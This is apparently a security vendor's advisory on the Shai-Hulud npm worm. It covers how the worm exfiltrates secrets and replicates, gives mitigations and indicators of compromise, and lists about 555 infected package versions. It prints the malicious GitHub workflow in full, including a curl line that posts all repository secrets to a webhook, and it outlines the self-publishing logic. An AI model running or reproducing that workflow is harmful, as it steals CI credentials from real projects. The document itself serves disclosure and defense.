⚠️ This is an ongoing incident: This supply chain attack is still unfolding. Our immediate priority is supporting customers with clear communication and actionable guidance. As it stands, no Endor Labs customers have been affected. In the interest of extra caution, our engineering team has suspended any use of npm install until further notice for all our internal systems and developers laptops. We will continue to update this post as new details and mitigation steps become available.
TL;DR
Starting Sep 15, several packages with malicious code have been published on npm, including packages from Crowdstrike and the popular npm package @ctrl/tinycolor, which has millions of downloads. So far, we have identified more than 550 affected versions from 122 distinct packages, with possibly more yet to be discovered.
What makes this supply chain attack different from previous ones is that the code spreads like a virus to other packages–which get published on npm using the npm credentials of compromised developers.
The spreading of the virus is still on-going, and organizations should take immediate actions to prevent being infected.
At the time of writing, not all of the malicious packages have been taken down, i.e. there is imminent risk of being infected by the malware.
Updates:
- The SHA-256 digest of bundle.js files included in infected packages changes (see below for different digests found until now). However, the Webhook URL used for exfiltration of repository secrets–which has been disabled in the meantime–does not change between different versions.
- The earliest package we found that contained the malicious payload is airpilot@0.8.8, published on 2025-09-14T18:35:07.600Z, which has been yanked from the registry by now.
- Added more information to make explicit that information is not only exfiltrated through a Webhook, but also by uploading files to a dedicated GitHub repository (similar to the recent attack on the Nx build system).
Technical Details
The malicious code of infected packages is contained in the Webpack-minified script bundle.js
, as large as 3.7 MB and automatically executed using an installation hook. At high-level, the script comprises two main functionalities:
- It searches for and exfiltrates secrets both on the infected system and GitHub repositories associated with compromised developers.
- It replicates itself in other npm packages maintained by compromised developers.
The search for secrets on the developer system is done by dumping environment variables, which is pretty common for malicious packages. More interestingly, it also downloads and runs Trufflehog, a well-known secret scanner, to search for credentials. The collected data is uploaded to a new repository Shai-Hulud in the user account of the affected developer. This new repository contains a double base64-encoded file data.json with the following information:
- The platform and architecture of the infected system.
- All environment variables from process.env.
- Credentials for GitHub, AWS, GCP and npm (if any).
- Information about the presence of Trufflehog on the affected system plus Trufflehog scan results.
In order to search for secrets on GitHub, it uses a GitHub personal access token (PAT) to enumerate repositories that meet certain criteria, and create a workflow file .github/workflows/shai-hulud-workflow.yml
in each one of them in a new branch called shai-hulud
. This workflow file uses the built-in function toJSON to capture all repository secrets in the environment variable CONTENTS, which is extracted to a Webhook. The complete workflow file looks as follows (with the Webhook URL being escaped).
on:
push:
jobs:
process:
runs-on: ubuntu-latest
steps:
- name: Data Processing
run: curl -d "$CONTENTS" https[://]webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7; echo "$CONTENTS" | base64 -w 0 | base64 -w 0
env:
CONTENTS: ${{ toJSON(secrets) }}
The replication logic of the virus takes advantage of valid npm tokens present on the infected system in order to download other packages of the maintainer, add the malicious payload and upload a new compromised version to npm.
This approach helps spread malware across the whole npm ecosystem–a scenario that was described as early as 2016.
Mitigation
The blast radius of this supply chain attack is yet unknown, and it will take some time to identify and remove all the infected versions from the registry.
Packages and package versions identified so far are mentioned in the section below, and will be updated on a regular basis.
To protect your developers and CI/CD systems from downloading and executing the malware, you can:
- Make sure that your npm applications use lockfiles pinned to known-good versions.
- Clean caches on developer systems and in internal registries.
- Use cooldown options where available, which prevent upgrading to (or downloading) versions that have been published in the last few days (see the corresponding announcement for Dependabot).
- Aggressive/Minimize Security Risk: Stop all usage of npm in CI/CD pipelines and notify developers about the risks.
To understand whether you have been compromised, you can:
- Search the local filesystem for package-lock.json files that reference any of the infected package versions (see below for a full list).
- Search logs for any of the following IoCs:
- https[://]webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7
- SHA-256 digests of bundle.js found in different infected packages: 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09
81d2a004a1bca6ef87a1caf7d0e0b355ad1764238e40ff6d1b1cb77ad4f595c3
dc67467a39b70d1cd4c1f7f7a459b35058163592f4a9e8fb4dffcbba98ef210c
If you publish npm packages on public or private registries, you can detect / prevent the spreading of the virus:
- Search logs and registries to understand whether new package versions have been published after Sep 15, 00:00 UTC.
- If yes, check whether the package deviates suspiciously from previous versions, e.g., in terms of build attestations, the presence of matching version tags in the corresponding Git repository, etc.
- The tarballs of published packages can be checked as follows for malicious code:
- Does package.json contain an install hook “postinstall": "node bundle.js”?
- Does the file bundle.js exist in the root directory of the tarball, with the SHA-256 indicated above?
- As an aggressive approach to minimize security risk, restrict the publication of new packages, e.g., by temporarily revoking publishing permissions from npm teams or npm accounts.
Malicious Package Detection
Detect and block malware



List of compromised packages
The following table contains a list of 555 known-infected packages and versions:
Package Name |
Version |
Publish Date |
json-rules-engine-simplified | 0.2.1 | 2025-09-14T17:58:51.203Z |
airpilot | 0.8.8 | 2025-09-14T18:35:07.600Z |
mcp-knowledge-graph | 1.2.1 | 2025-09-14T18:35:09.494Z |
airchief | 0.3.1 | 2025-09-14T18:35:09.521Z |
jumpgate | 0.0.2 | 2025-09-14T18:35:09.651Z |
tvi-cli | 0.1.5 | 2025-09-14T18:35:10.996Z |
@thangved/callback-window | 1.1.4 | 2025-09-14T20:31:38.479Z |
@tnf-dev/api | 1.0.8 | 2025-09-14T20:31:39.547Z |
@tnf-dev/js | 1.0.8 | 2025-09-14T20:31:41.251Z |
@tnf-dev/mui | 1.0.8 | 2025-09-14T20:31:41.259Z |
@tnf-dev/core | 1.0.8 | 2025-09-14T20:31:42.728Z |
@teselagen/react-table | 6.10.20 | 2025-09-14T20:37:08.597Z |
@hestjs/demo | 0.1.2 | 2025-09-14T20:45:52.348Z |
@nexe/eslint-config | 0.1.1 | 2025-09-14T20:45:53.625Z |
@hestjs/eslint-config | 0.1.2 | 2025-09-14T20:45:55.044Z |
@nexe/config-manager | 0.1.1 | 2025-09-14T20:45:55.066Z |
@nexe/logger | 0.1.3 | 2025-09-14T20:45:55.170Z |
@hestjs/logger | 0.1.6 | 2025-09-14T20:45:55.197Z |
@hestjs/validation | 0.1.6 | 2025-09-14T20:45:55.595Z |
@hestjs/core | 0.2.1 | 2025-09-14T20:45:55.888Z |
@hestjs/cqrs | 0.1.6 | 2025-09-14T20:45:55.966Z |
@hestjs/scalar | 0.1.7 | 2025-09-14T20:45:56.386Z |
ng2-file-upload | 7.0.3 | 2025-09-15T02:44:29.555Z |
capacitor-notificationhandler | 0.0.2 | 2025-09-15T04:54:48.431Z |
capacitor-plugin-vonage | 1.0.2 | 2025-09-15T04:54:48.501Z |
capacitor-plugin-healthapp | 0.0.2 | 2025-09-15T04:54:48.704Z |
capacitorandroidpermissions | 0.0.4 | 2025-09-15T04:54:48.753Z |
voip-callkit | 1.0.2 | 2025-09-15T04:54:49.223Z |
capacitor-plugin-ihealth | 1.1.8 | 2025-09-15T04:55:08.113Z |
@art-ws/common | 2.0.22 | 2025-09-15T05:21:15.411Z |
@art-ws/config-eslint | 2.0.4 | 2025-09-15T05:21:17.199Z |
ngx-ws | 1.1.5 | 2025-09-15T05:21:17.514Z |
@art-ws/slf | 2.0.15 | 2025-09-15T05:21:17.524Z |
@art-ws/http-server | 2.0.21 | 2025-09-15T05:21:17.745Z |
pm2-gelf-json | 1.0.4 | 2025-09-15T05:21:18.413Z |
@art-ws/di | 2.0.28 | 2025-09-15T05:21:18.488Z |
@art-ws/di-node | 2.0.13 | 2025-09-15T05:21:18.849Z |
@art-ws/config-ts | 2.0.7 | 2025-09-15T05:21:19.408Z |
@art-ws/db-context | 2.0.21 | 2025-09-15T05:21:19.814Z |
@art-ws/openapi | 0.1.9 | 2025-09-15T05:21:19.969Z |
@art-ws/web-app | 1.0.3 | 2025-09-15T05:21:20.383Z |
@art-ws/ssl-info | 1.0.9 | 2025-09-15T05:21:20.927Z |
@art-ws/fastify-http-server | 2.0.24 | 2025-09-15T05:21:21.089Z |
ts-imports | 1.0.1 | 2025-09-15T05:21:21.183Z |
@art-ws/eslint | 1.0.5 | 2025-09-15T05:21:21.335Z |
@art-ws/prettier | 1.0.5 | 2025-09-15T05:21:22.202Z |
@art-ws/package-base | 1.0.5 | 2025-09-15T05:21:22.520Z |
db-evo | 1.1.4 | 2025-09-15T05:21:22.963Z |
@thangved/callback-window | 1.1.4-0 | 2025-09-15T05:52:26.712Z |
@thangved/callback-window | 1.1.5-0 | 2025-09-15T05:54:27.203Z |
@thangved/callback-window | 1.1.5 | 2025-09-15T05:55:09.253Z |
printjs-rpk | 1.6.1 | 2025-09-15T07:43:23.772Z |
globalize-rpk | 1.7.4 | 2025-09-15T07:43:24.782Z |
@ui-ux-gang/devextreme-angular-rpk | 24.1.7 | 2025-09-15T07:43:29.311Z |
devextreme-angular-rpk | 21.2.8 | 2025-09-15T07:43:38.694Z |
mstate-angular | 0.4.4 | 2025-09-15T08:21:35.959Z |
mobioffice-cli | 1.0.3 | 2025-09-15T08:21:37.238Z |
mstate-react | 1.6.5 | 2025-09-15T08:21:37.714Z |
mstate-cli | 0.4.7 | 2025-09-15T08:21:38.144Z |
mstate-dev-react | 1.1.1 | 2025-09-15T08:21:38.198Z |
@ahmedhfarag/ngx-perfect-scrollbar | 20.0.20 | 2025-09-15T08:28:26.548Z |
@ahmedhfarag/ngx-virtual-scroller | 4.0.4 | 2025-09-15T08:28:28.605Z |
@art-ws/di-node | 2.0.18 | 2025-09-15T08:56:13.561Z |
@art-ws/http-server | 2.0.24 | 2025-09-15T08:56:16.966Z |
@art-ws/http-server | 2.0.25 | 2025-09-15T08:58:33.548Z |
@art-ws/fastify-http-server | 2.0.27 | 2025-09-15T08:58:33.672Z |
@art-ws/openapi | 0.1.12 | 2025-09-15T08:58:34.341Z |
@art-ws/di | 2.0.32 | 2025-09-15T08:58:35.488Z |
@art-ws/common | 2.0.28 | 2025-09-15T08:58:35.799Z |
@art-ws/db-context | 2.0.24 | 2025-09-15T08:58:35.991Z |
@art-ws/slf | 2.0.22 | 2025-09-15T08:58:36.691Z |
ngx-ws | 1.1.6 | 2025-09-15T08:58:36.712Z |
db-evo | 1.1.5 | 2025-09-15T08:58:38.222Z |
@art-ws/ssl-info | 1.0.10 | 2025-09-15T08:58:38.961Z |
pm2-gelf-json | 1.0.5 | 2025-09-15T08:58:39.621Z |
ts-imports | 1.0.2 | 2025-09-15T08:58:40.163Z |
@art-ws/eslint | 1.0.6 | 2025-09-15T08:58:41.585Z |
@art-ws/config-eslint | 2.0.5 | 2025-09-15T08:58:42.203Z |
@art-ws/prettier | 1.0.6 | 2025-09-15T08:58:43.459Z |
@art-ws/config-ts | 2.0.8 | 2025-09-15T08:58:44.254Z |
@art-ws/web-app | 1.0.4 | 2025-09-15T08:58:44.290Z |
@nativescript-community/typeorm | 0.2.33 | 2025-09-15T13:16:48.773Z |
mcfly-semantic-release | 1.3.1 | 2025-09-15T15:35:25.333Z |
wdio-web-reporter | 0.1.3 | 2025-09-15T15:35:30.130Z |
yoo-styles | 6.0.326 | 2025-09-15T15:35:31.074Z |
cordova-plugin-voxeet2 | 1.0.24 | 2025-09-15T15:35:31.426Z |
cordova-voxeet | 1.0.32 | 2025-09-15T15:35:32.747Z |
@yoobic/jpeg-camera-es6 | 1.0.13 | 2025-09-15T15:35:34.449Z |
@yoobic/design-system | 6.5.17 | 2025-09-15T15:35:44.425Z |
react-jsonschema-form-extras | 1.0.4 | 2025-09-15T15:45:54.639Z |
@ctrl/ngx-emoji-mart | 9.2.2 | 2025-09-15T20:13:46.055Z |
@operato/utils | 9.0.22 | 2025-09-15T22:35:31.744Z |
@things-factory/email-base | 9.0.42 | 2025-09-15T22:35:47.687Z |
@operato/headroom | 9.0.2 | 2025-09-15T22:36:14.884Z |
@operato/graphql | 9.0.22 | 2025-09-15T22:36:23.348Z |
@operato/popup | 9.0.22 | 2025-09-15T22:36:25.699Z |
@things-factory/env | 9.0.42 | 2025-09-15T22:36:26.269Z |
@things-factory/auth-base | 9.0.42 | 2025-09-15T22:36:27.663Z |
@operato/shell | 9.0.22 | 2025-09-15T22:36:29.879Z |
@operato/styles | 9.0.2 | 2025-09-15T22:36:32.528Z |
@things-factory/attachment-base | 9.0.42 | 2025-09-15T22:36:33.562Z |
@things-factory/shell | 9.0.42 | 2025-09-15T22:36:36.816Z |
@things-factory/integration-marketplace | 9.0.42 | 2025-09-15T22:36:44.206Z |
@operato/data-grist | 9.0.29 | 2025-09-15T22:36:46.091Z |
@things-factory/integration-base | 9.0.42 | 2025-09-15T22:36:52.653Z |
@operato/input | 9.0.27 | 2025-09-15T22:36:53.174Z |
tbssnch | 1.0.2 | 2025-09-15T22:44:44.085Z |
@operato/input | 9.0.33 | 2025-09-15T22:55:00.648Z |
@operato/data-grist | 9.0.33 | 2025-09-15T22:55:04.070Z |
@operato/headroom | 9.0.34 | 2025-09-15T23:37:57.254Z |
@operato/styles | 9.0.34 | 2025-09-15T23:37:59.787Z |
@operato/utils | 9.0.34 | 2025-09-15T23:37:59.876Z |
@operato/graphql | 9.0.34 | 2025-09-15T23:38:02.159Z |
@operato/shell | 9.0.34 | 2025-09-15T23:38:04.505Z |
@operato/input | 9.0.34 | 2025-09-15T23:38:05.009Z |
@operato/data-grist | 9.0.34 | 2025-09-15T23:38:09.820Z |
@operato/graphql | 9.0.35 | 2025-09-15T23:43:51.514Z |
@operato/utils | 9.0.35 | 2025-09-15T23:43:54.961Z |
@operato/layout | 9.0.35 | 2025-09-15T23:43:55.027Z |
@operato/popup | 9.0.35 | 2025-09-15T23:43:56.620Z |
@operato/help | 9.0.35 | 2025-09-15T23:44:21.165Z |
@operato/styles | 9.0.35 | 2025-09-15T23:44:21.178Z |
@operato/shell | 9.0.35 | 2025-09-15T23:44:21.582Z |
@operato/board | 9.0.35 | 2025-09-15T23:44:22.304Z |
@operato/data-grist | 9.0.35 | 2025-09-15T23:44:22.678Z |
@operato/headroom | 9.0.35 | 2025-09-15T23:44:23.129Z |
@operato/input | 9.0.35 | 2025-09-15T23:44:23.913Z |
@operato/i18n | 9.0.35 | 2025-09-15T23:44:24.729Z |
@things-factory/shell | 9.0.43 | 2025-09-15T23:44:29.819Z |
@things-factory/email-base | 9.0.43 | 2025-09-15T23:44:30.916Z |
@things-factory/env | 9.0.43 | 2025-09-15T23:44:32.181Z |
@things-factory/integration-marketplace | 9.0.43 | 2025-09-15T23:44:32.498Z |
@things-factory/integration-base | 9.0.43 | 2025-09-15T23:44:34.890Z |
@crowdstrike/logscale-dashboard | 1.205.2 | 2025-09-16T01:22:34.316Z |
@operato/popup | 9.0.36 | 2025-09-16T01:25:25.875Z |
@things-factory/email-base | 9.0.44 | 2025-09-16T01:25:27.421Z |
@operato/i18n | 9.0.36 | 2025-09-16T01:25:27.715Z |
@operato/utils | 9.0.36 | 2025-09-16T01:25:29.881Z |
@operato/graphql | 9.0.36 | 2025-09-16T01:25:30.071Z |
@operato/board | 9.0.36 | 2025-09-16T01:25:31.232Z |
@operato/shell | 9.0.36 | 2025-09-16T01:25:31.688Z |
@operato/layout | 9.0.36 | 2025-09-16T01:25:32.674Z |
@operato/headroom | 9.0.36 | 2025-09-16T01:25:33.812Z |
@operato/styles | 9.0.36 | 2025-09-16T01:25:35.524Z |
@operato/help | 9.0.36 | 2025-09-16T01:25:36.211Z |
@operato/input | 9.0.36 | 2025-09-16T01:25:36.810Z |
@things-factory/env | 9.0.44 | 2025-09-16T01:25:41.599Z |
@operato/data-grist | 9.0.36 | 2025-09-16T01:25:43.979Z |
@things-factory/auth-base | 9.0.44 | 2025-09-16T01:25:53.415Z |
@things-factory/shell | 9.0.44 | 2025-09-16T01:25:53.741Z |
@things-factory/integration-marketplace | 9.0.44 | 2025-09-16T01:25:56.997Z |
@things-factory/integration-base | 9.0.44 | 2025-09-16T01:25:59.153Z |
@operato/pull-to-refresh | 9.0.35 | 2025-09-16T01:30:28.068Z |
@operato/headroom | 9.0.37 | 2025-09-16T01:30:31.260Z |
@operato/layout | 9.0.37 | 2025-09-16T01:30:31.539Z |
@operato/utils | 9.0.37 | 2025-09-16T01:30:32.081Z |
@operato/data-grist | 9.0.37 | 2025-09-16T01:30:33.891Z |
@operato/popup | 9.0.37 | 2025-09-16T01:30:34.004Z |
@operato/styles | 9.0.37 | 2025-09-16T01:30:34.455Z |
@operato/board | 9.0.37 | 2025-09-16T01:30:34.876Z |
@things-factory/integration-marketplace | 9.0.45 | 2025-09-16T01:30:36.299Z |
@things-factory/shell | 9.0.45 | 2025-09-16T01:30:36.521Z |
@operato/help | 9.0.37 | 2025-09-16T01:30:36.886Z |
@operato/shell | 9.0.37 | 2025-09-16T01:30:37.018Z |
@things-factory/env | 9.0.45 | 2025-09-16T01:30:37.159Z |
@operato/input | 9.0.37 | 2025-09-16T01:30:38.367Z |
@operato/graphql | 9.0.37 | 2025-09-16T01:30:38.685Z |
@things-factory/email-base | 9.0.45 | 2025-09-16T01:30:40.617Z |
@things-factory/auth-base | 9.0.45 | 2025-09-16T01:30:40.921Z |
@things-factory/integration-base | 9.0.45 | 2025-09-16T01:30:41.833Z |
@tnf-dev/core | 1.0.8-0 | 2025-09-16T01:51:51.655Z |
@tnf-dev/api | 1.0.8-0 | 2025-09-16T01:51:54.001Z |
@tnf-dev/js | 1.0.8-0 | 2025-09-16T01:51:54.006Z |
@tnf-dev/react | 1.0.8-0 | 2025-09-16T01:51:56.953Z |
@tnf-dev/mui | 1.0.8-0 | 2025-09-16T01:51:59.355Z |
@tnf-dev/core | 1.0.9-0 | 2025-09-16T02:15:09.740Z |
@tnf-dev/api | 1.0.9-0 | 2025-09-16T02:15:13.602Z |
@tnf-dev/js | 1.0.9-0 | 2025-09-16T02:15:14.139Z |
@tnf-dev/react | 1.0.9-0 | 2025-09-16T02:15:17.984Z |
@tnf-dev/mui | 1.0.9-0 | 2025-09-16T02:15:22.167Z |
@tnf-dev/core | 1.0.10-0 | 2025-09-16T02:19:24.107Z |
@tnf-dev/api | 1.0.10-0 | 2025-09-16T02:19:27.186Z |
@tnf-dev/js | 1.0.10-0 | 2025-09-16T02:19:27.249Z |
@tnf-dev/react | 1.0.10-0 | 2025-09-16T02:19:30.466Z |
@tnf-dev/mui | 1.0.10-0 | 2025-09-16T02:19:33.305Z |
@tnf-dev/core | 1.0.10 | 2025-09-16T02:20:43.330Z |
@tnf-dev/api | 1.0.10 | 2025-09-16T02:20:47.749Z |
@tnf-dev/js | 1.0.10 | 2025-09-16T02:20:47.753Z |
@tnf-dev/react | 1.0.10 | 2025-09-16T02:20:52.961Z |
@tnf-dev/mui | 1.0.10 | 2025-09-16T02:20:57.574Z |
oradm-to-gql | 35.0.15 | 2025-09-16T02:33:01.569Z |
ve-editor | 1.0.2 | 2025-09-16T02:33:01.936Z |
@teselagen/react-list | 0.8.20 | 2025-09-16T02:33:05.866Z |
oradm-to-sqlz | 1.1.5 | 2025-09-16T02:33:05.912Z |
ve-bamreader | 0.2.7 | 2025-09-16T02:33:07.278Z |
tg-client-query-builder | 2.14.5 | 2025-09-16T02:33:08.444Z |
teselagen-interval-tree | 1.1.2 | 2025-09-16T02:33:09.346Z |
tg-redbird | 1.3.2 | 2025-09-16T02:33:09.943Z |
eslint-config-teselagen | 6.1.8 | 2025-09-16T02:33:10.612Z |
@teselagen/range-utils | 0.3.15 | 2025-09-16T02:33:10.978Z |
graphql-sequelize-teselagen | 5.3.9 | 2025-09-16T02:33:11.821Z |
@teselagen/bounce-loader | 0.3.17 | 2025-09-16T02:33:12.756Z |
@teselagen/react-table | 6.10.22 | 2025-09-16T02:33:13.667Z |
tg-seq-gen | 1.0.10 | 2025-09-16T02:33:16.516Z |
ove-auto-annotate | 0.0.10 | 2025-09-16T02:33:17.812Z |
@operato/graphql | 9.0.38 | 2025-09-16T03:18:00.716Z |
@operato/popup | 9.0.38 | 2025-09-16T03:18:09.287Z |
@operato/utils | 9.0.38 | 2025-09-16T03:18:13.317Z |
@operato/i18n | 9.0.37 | 2025-09-16T03:18:19.031Z |
@operato/help | 9.0.38 | 2025-09-16T03:18:29.395Z |
@operato/shell | 9.0.38 | 2025-09-16T03:18:30.051Z |
@operato/board | 9.0.38 | 2025-09-16T03:18:34.319Z |
@things-factory/email-base | 9.0.46 | 2025-09-16T03:18:34.369Z |
@operato/input | 9.0.38 | 2025-09-16T03:18:34.857Z |
@things-factory/attachment-base | 9.0.43 | 2025-09-16T03:25:14.019Z |
@operato/graphql | 9.0.39 | 2025-09-16T03:25:18.323Z |
@operato/help | 9.0.39 | 2025-09-16T03:25:19.205Z |
@operato/shell | 9.0.39 | 2025-09-16T03:25:19.551Z |
@operato/utils | 9.0.39 | 2025-09-16T03:25:20.148Z |
@operato/board | 9.0.39 | 2025-09-16T03:25:20.602Z |
@operato/popup | 9.0.39 | 2025-09-16T03:25:21.003Z |
@things-factory/email-base | 9.0.47 | 2025-09-16T03:25:21.355Z |
@operato/input | 9.0.39 | 2025-09-16T03:25:21.405Z |
@operato/help | 9.0.40 | 2025-09-16T05:32:04.633Z |
@operato/pull-to-refresh | 9.0.36 | 2025-09-16T05:32:05.613Z |
@things-factory/attachment-base | 9.0.44 | 2025-09-16T05:32:12.237Z |
@operato/graphql | 9.0.40 | 2025-09-16T05:32:18.846Z |
@operato/input | 9.0.40 | 2025-09-16T05:32:19.698Z |
@operato/popup | 9.0.40 | 2025-09-16T05:32:22.677Z |
@things-factory/email-base | 9.0.48 | 2025-09-16T05:32:29.882Z |
@operato/board | 9.0.40 | 2025-09-16T05:32:29.904Z |
@operato/utils | 9.0.40 | 2025-09-16T05:32:30.033Z |
@operato/pull-to-refresh | 9.0.37 | 2025-09-16T06:17:32.577Z |
@things-factory/attachment-base | 9.0.45 | 2025-09-16T06:17:34.484Z |
@operato/help | 9.0.41 | 2025-09-16T06:17:36.429Z |
@operato/graphql | 9.0.41 | 2025-09-16T06:17:54.495Z |
@operato/popup | 9.0.41 | 2025-09-16T06:17:57.188Z |
@operato/board | 9.0.41 | 2025-09-16T06:18:00.952Z |
@things-factory/email-base | 9.0.49 | 2025-09-16T06:18:01.687Z |
@operato/utils | 9.0.41 | 2025-09-16T06:18:02.642Z |
@operato/input | 9.0.41 | 2025-09-16T06:18:04.507Z |
@operato/pull-to-refresh | 9.0.38 | 2025-09-16T06:24:51.556Z |
@things-factory/attachment-base | 9.0.46 | 2025-09-16T06:24:52.855Z |
@operato/help | 9.0.42 | 2025-09-16T06:24:56.200Z |
@operato/graphql | 9.0.42 | 2025-09-16T06:24:56.260Z |
@operato/utils | 9.0.42 | 2025-09-16T06:24:57.547Z |
@operato/board | 9.0.42 | 2025-09-16T06:24:57.986Z |
@operato/input | 9.0.42 | 2025-09-16T06:24:59.044Z |
@operato/popup | 9.0.42 | 2025-09-16T06:24:59.048Z |
@things-factory/email-base | 9.0.50 | 2025-09-16T06:24:59.396Z |
@operato/pull-to-refresh | 9.0.39 | 2025-09-16T06:32:44.820Z |
@things-factory/attachment-base | 9.0.47 | 2025-09-16T06:32:50.192Z |
@operato/help | 9.0.43 | 2025-09-16T06:32:50.995Z |
@things-factory/email-base | 9.0.51 | 2025-09-16T06:32:51.133Z |
@operato/graphql | 9.0.43 | 2025-09-16T06:32:52.540Z |
@operato/popup | 9.0.43 | 2025-09-16T06:32:54.603Z |
@operato/input | 9.0.43 | 2025-09-16T06:32:56.421Z |
@operato/utils | 9.0.43 | 2025-09-16T06:32:56.752Z |
@operato/board | 9.0.43 | 2025-09-16T06:32:57.226Z |
@operato/pull-to-refresh | 9.0.40 | 2025-09-16T06:38:45.820Z |
@operato/graphql | 9.0.44 | 2025-09-16T06:38:47.399Z |
@things-factory/attachment-base | 9.0.48 | 2025-09-16T06:38:48.546Z |
@operato/popup | 9.0.44 | 2025-09-16T06:38:49.877Z |
@operato/input | 9.0.44 | 2025-09-16T06:38:50.873Z |
@operato/help | 9.0.44 | 2025-09-16T06:38:51.217Z |
@operato/utils | 9.0.44 | 2025-09-16T06:38:52.393Z |
@things-factory/email-base | 9.0.52 | 2025-09-16T06:38:52.433Z |
@operato/board | 9.0.44 | 2025-09-16T06:38:52.927Z |
@operato/board | 9.0.45 | 2025-09-16T07:05:55.592Z |
@operato/pull-to-refresh | 9.0.41 | 2025-09-16T07:05:55.990Z |
@operato/utils | 9.0.45 | 2025-09-16T07:05:57.583Z |
@operato/help | 9.0.45 | 2025-09-16T07:05:57.743Z |
@operato/popup | 9.0.45 | 2025-09-16T07:05:58.377Z |
@things-factory/email-base | 9.0.53 | 2025-09-16T07:05:59.138Z |
@operato/graphql | 9.0.45 | 2025-09-16T07:05:59.328Z |
@operato/input | 9.0.45 | 2025-09-16T07:06:00.063Z |
@things-factory/attachment-base | 9.0.49 | 2025-09-16T07:06:00.164Z |
@operato/pull-to-refresh | 9.0.42 | 2025-09-16T07:11:15.752Z |
@operato/utils | 9.0.46 | 2025-09-16T07:11:19.137Z |
@operato/graphql | 9.0.46 | 2025-09-16T07:11:20.291Z |
@operato/popup | 9.0.46 | 2025-09-16T07:11:21.299Z |
@things-factory/attachment-base | 9.0.50 | 2025-09-16T07:11:28.491Z |
@operato/help | 9.0.46 | 2025-09-16T07:11:32.725Z |
@operato/input | 9.0.46 | 2025-09-16T07:11:35.188Z |
@things-factory/email-base | 9.0.54 | 2025-09-16T07:11:35.541Z |
@operato/board | 9.0.46 | 2025-09-16T07:11:35.626Z |
capacitor-plugin-vonage | 1.0.3 | 2025-09-16T07:41:37.367Z |
capacitorandroidpermissions | 0.0.5 | 2025-09-16T07:41:38.804Z |
capacitor-plugin-healthapp | 0.0.3 | 2025-09-16T07:41:39.369Z |
capacitor-notificationhandler | 0.0.3 | 2025-09-16T07:41:40.401Z |
voip-callkit | 1.0.3 | 2025-09-16T07:41:40.934Z |
capacitor-plugin-ihealth | 1.1.9 | 2025-09-16T07:41:54.799Z |
koa2-swagger-ui | 5.12.0 | 2025-09-16T07:41:56.321Z |
@operato/pull-to-refresh | 9.0.43 | 2025-09-16T10:56:43.316Z |
@things-factory/attachment-base | 9.0.51 | 2025-09-16T10:56:49.181Z |
@operato/graphql | 9.0.47 | 2025-09-16T10:56:54.529Z |
@operato/utils | 9.0.47 | 2025-09-16T10:56:57.202Z |
@operato/popup | 9.0.47 | 2025-09-16T10:56:58.097Z |
@operato/board | 9.0.47 | 2025-09-16T10:56:58.469Z |
@operato/help | 9.0.47 | 2025-09-16T10:56:58.491Z |
@things-factory/email-base | 9.0.55 | 2025-09-16T10:57:27.703Z |
@operato/input | 9.0.47 | 2025-09-16T10:57:41.858Z |
@operato/pull-to-refresh | 9.0.44 | 2025-09-16T11:01:57.865Z |
@things-factory/attachment-base | 9.0.52 | 2025-09-16T11:02:07.031Z |
@operato/board | 9.0.48 | 2025-09-16T11:02:10.546Z |
@operato/utils | 9.0.48 | 2025-09-16T11:02:11.660Z |
@operato/popup | 9.0.48 | 2025-09-16T11:02:14.613Z |
@operato/help | 9.0.48 | 2025-09-16T11:02:31.388Z |
@operato/graphql | 9.0.48 | 2025-09-16T11:02:31.874Z |
@operato/input | 9.0.48 | 2025-09-16T11:02:32.990Z |
@things-factory/email-base | 9.0.56 | 2025-09-16T11:02:33.656Z |
@things-factory/attachment-base | 9.0.53 | 2025-09-16T11:09:06.486Z |
@operato/pull-to-refresh | 9.0.45 | 2025-09-16T11:09:07.621Z |
@operato/graphql | 9.0.49 | 2025-09-16T11:09:08.767Z |
@operato/board | 9.0.49 | 2025-09-16T11:09:09.769Z |
@operato/popup | 9.0.49 | 2025-09-16T11:09:10.443Z |
@things-factory/email-base | 9.0.57 | 2025-09-16T11:09:11.328Z |
@operato/help | 9.0.49 | 2025-09-16T11:09:11.388Z |
@operato/utils | 9.0.49 | 2025-09-16T11:09:14.056Z |
@operato/pull-to-refresh | 9.0.46 | 2025-09-16T11:38:13.492Z |
@things-factory/attachment-base | 9.0.54 | 2025-09-16T11:38:13.862Z |
@operato/board | 9.0.50 | 2025-09-16T11:38:17.348Z |
@operato/utils | 9.0.50 | 2025-09-16T11:38:22.885Z |
@operato/graphql | 9.0.50 | 2025-09-16T11:38:59.825Z |
@operato/help | 9.0.50 | 2025-09-16T11:39:15.933Z |
@operato/popup | 9.0.50 | 2025-09-16T11:39:21.604Z |
@things-factory/email-base | 9.0.58 | 2025-09-16T11:39:24.484Z |
@operato/pull-to-refresh | 9.0.47 | 2025-09-16T11:43:23.927Z |
@things-factory/attachment-base | 9.0.55 | 2025-09-16T11:43:31.570Z |
@operato/graphql | 9.0.51 | 2025-09-16T11:43:36.822Z |
@operato/utils | 9.0.51 | 2025-09-16T11:43:55.620Z |
@operato/board | 9.0.51 | 2025-09-16T11:44:00.217Z |
@operato/popup | 9.0.51 | 2025-09-16T11:44:03.342Z |
@things-factory/email-base | 9.0.59 | 2025-09-16T11:44:04.279Z |
@operato/help | 9.0.51 | 2025-09-16T11:44:04.847Z |
@ctrl/tinycolor | 4.1.2 | unknown |